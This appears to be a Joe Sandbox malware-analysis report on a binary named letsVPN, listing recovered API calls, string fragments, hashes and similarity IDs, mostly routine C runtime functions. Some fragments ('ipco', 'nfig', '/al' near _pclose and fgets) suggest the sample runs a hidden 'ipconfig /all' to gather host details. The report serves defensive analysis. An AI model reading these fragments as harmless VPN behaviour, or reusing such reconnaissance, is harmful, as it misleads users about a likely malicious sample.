                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionThrow$std::system_error::system_error
                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                    • API String ID: 1466986864-1866435925
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast__freetlocinfo_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2902648625-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle_set_osfhnd_unlock_fhandle$_errno_invoke_watson
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 455515276-727254517
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 1501107325-3145022300
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowctypestd::bad_exception::bad_exception
                                                                                                                                                                                                    • String ID: bad cast
                                                                                                                                                                                                    • API String ID: 4140347317-3145022300
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_getbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 529825914-727254517
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProcstd::exception::exception
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 1703389215-340411864
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lseeki64_nolock$CloseErrorFileHandleLast__create_close_nolock_dosmaperr_errno_free_osfhnd_get_osfhandle_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3571818248-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1855319098-0
                                                                                                                                                                                                    • Opcode ID: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction ID: 77f0e84e2c0fddebd83e6d166913a46376ceeea5f20c07d06525607cc615e4e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9511ED72B0298849FFEFDEA280A53FC2351DF5DF88F188115E90609186CE65CACCD391
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    • Opcode ID: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction ID: 3db9a0fe6634f3d3d23e1512d5a19f59bf1e8e73e648120e41056d0fc3e5ac56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F03037A0490CD5E7A76F6480063EC35A0E7ACB89F99C561B2004B392CFBD47C88B12
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction ID: ae10803b799a65974c3657ee31f7494a09801b087079cfbaffe163c152ee371c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D761C032300F4893EB96DB16E94179A33A1F78CBD8F448129AE5D07B51DF78C6A98744
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Locale_errno$ErrorFreeHeapLastSystemUpdateUpdate::__setmbcp_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 75022149-0
                                                                                                                                                                                                    • Opcode ID: c505612558760a02bbe298b45e3a9e656f110e3789c69d640b033d38dfb25e56
                                                                                                                                                                                                    • Instruction ID: 6a68ccb5b672a7b7b33fbd37b402f8a3b6eb5461299a8b9bcf453a44c8b75bba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c505612558760a02bbe298b45e3a9e656f110e3789c69d640b033d38dfb25e56
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051D732901E8882E792CB69C5403F877A1F79DB88F14D615EE5D47292DF79D6CAC700
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$StringType__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3694965756-0
                                                                                                                                                                                                    • Opcode ID: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction ID: 0015738cc1d336f68e0dd6607cf263a8890d2d7f9e42c5be51a897ba0436e770
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F441CEB2211BC89ADB9ACF25D584BDD33A5F74C788F418126EA4A83B90DF34C669C704
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 415692148-2662692612
                                                                                                                                                                                                    • Opcode ID: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction ID: f4854c72ffc7a175e6ff49575b655bf0dbf9db01d82d8384a320940945799e3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83313D3232499885F79FCA2F94077DC6655938EBC0F48D029A6468B7C6DF7587858342
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1281092736-0
                                                                                                                                                                                                    • Opcode ID: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction ID: 4f06c6f3f5a15a002521f997a85629dd4504b6509dbf14092c61ae02f8fed3b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E317C72604B8886E7A29B11D5847ADB6A5F74CBE0F148121FE5807B95CF34CA8AD740
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapProcess_heap_init_mtinit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 580264708-0
                                                                                                                                                                                                    • Opcode ID: f3e7a6cde2a6d7d1d2d6fc7e9f9cba91a86686b44dc750b74f80f48ea7706f68
                                                                                                                                                                                                    • Instruction ID: 539b000d1fa2fc10cc21c1703bf0313836cf8493cc9b6bf93ce020ad1b8767a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e7a6cde2a6d7d1d2d6fc7e9f9cba91a86686b44dc750b74f80f48ea7706f68
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E0BD30605F0E82FBC3B3B1690A3D922945B5E3E4F00C120B808812A3EE65836C83A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$ExceptionRaise_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2951875022-1018135373
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$EncodeFileHeaderPointerRaiseThrow_callnewh_calloc_crt
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2702659324-2104205924
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fgetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2807381905-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __pctype_func_getptd$___lc_codepage_func___lc_locale_name_func_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3272742379-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: std::exception::exception.LIBCMT ref: 000000018000791C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _CxxThrowException.LIBCMT ref: 0000000180007939
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: fgets.LIBCMT ref: 000000018000794C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _pclose.LIBCMT ref: 0000000180007980
                                                                                                                                                                                                      • Part of subcall function 0000000180001C6C: std::ios_base::getloc.LIBCPMT ref: 0000000180001C98
                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0000000180007DB0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionIos_base_dtorThrow_pclosefgetsstd::exception::exceptionstd::ios_base::_std::ios_base::getloc
                                                                                                                                                                                                    • String ID: /al$ipco$nfig
                                                                                                                                                                                                    • API String ID: 3465259001-4231646982
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                                                    • String ID: $csm
                                                                                                                                                                                                    • API String ID: 451473138-717980254
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseeki64_write
                                                                                                                                                                                                    • String ID: $p^f
                                                                                                                                                                                                    • API String ID: 2577073331-4239080599
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd$File__create_set_osfhnd_write
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 1668876506-727254517
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2118026453-820377970
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringTypefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3522554955-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$Copy_strFileHeaderRaiseThrow_pclosefgetsstd::exception::_std::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1743889360-0
                                                                                                                                                                                                    • Opcode ID: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction ID: 100ce4ba59c252cdb160de8ee261dbdff430980fbbf453e23859cd0748682005
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6317431608B8981EBA2DB14E4413EA7790F78C7D4F545225B69D06BAADF7CC349CB40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615622293-0
                                                                                                                                                                                                    • Opcode ID: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction ID: 9effb36682a3647b8937f0e7358b2fc8195419eedb52e07462cad8161f0c1b4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621C3723146A881EBE3461590503BDA7E2E3C8BF4F58C125FA9A0AAC6DD2CC749C712
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3089783468-0
                                                                                                                                                                                                    • Opcode ID: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction ID: c157a4136c12881e15d1d6466a1d1e032bd19282ed3789510d37b6ed984cd8dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211E732204B8C41FBE78615B4443FD67A1AB9A7D4F18C129FA96077C9CE68C74DD741
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$_getptd
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 2986147986-2662692612
                                                                                                                                                                                                    • Opcode ID: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
